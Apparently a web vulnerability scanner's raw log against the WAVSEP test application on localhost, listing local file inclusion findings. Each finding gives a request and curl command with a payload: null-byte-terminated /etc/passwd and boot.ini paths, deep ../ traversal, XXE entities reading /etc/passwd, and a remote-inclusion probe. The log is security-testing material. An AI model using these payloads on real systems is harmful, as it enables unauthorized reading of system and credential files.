Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
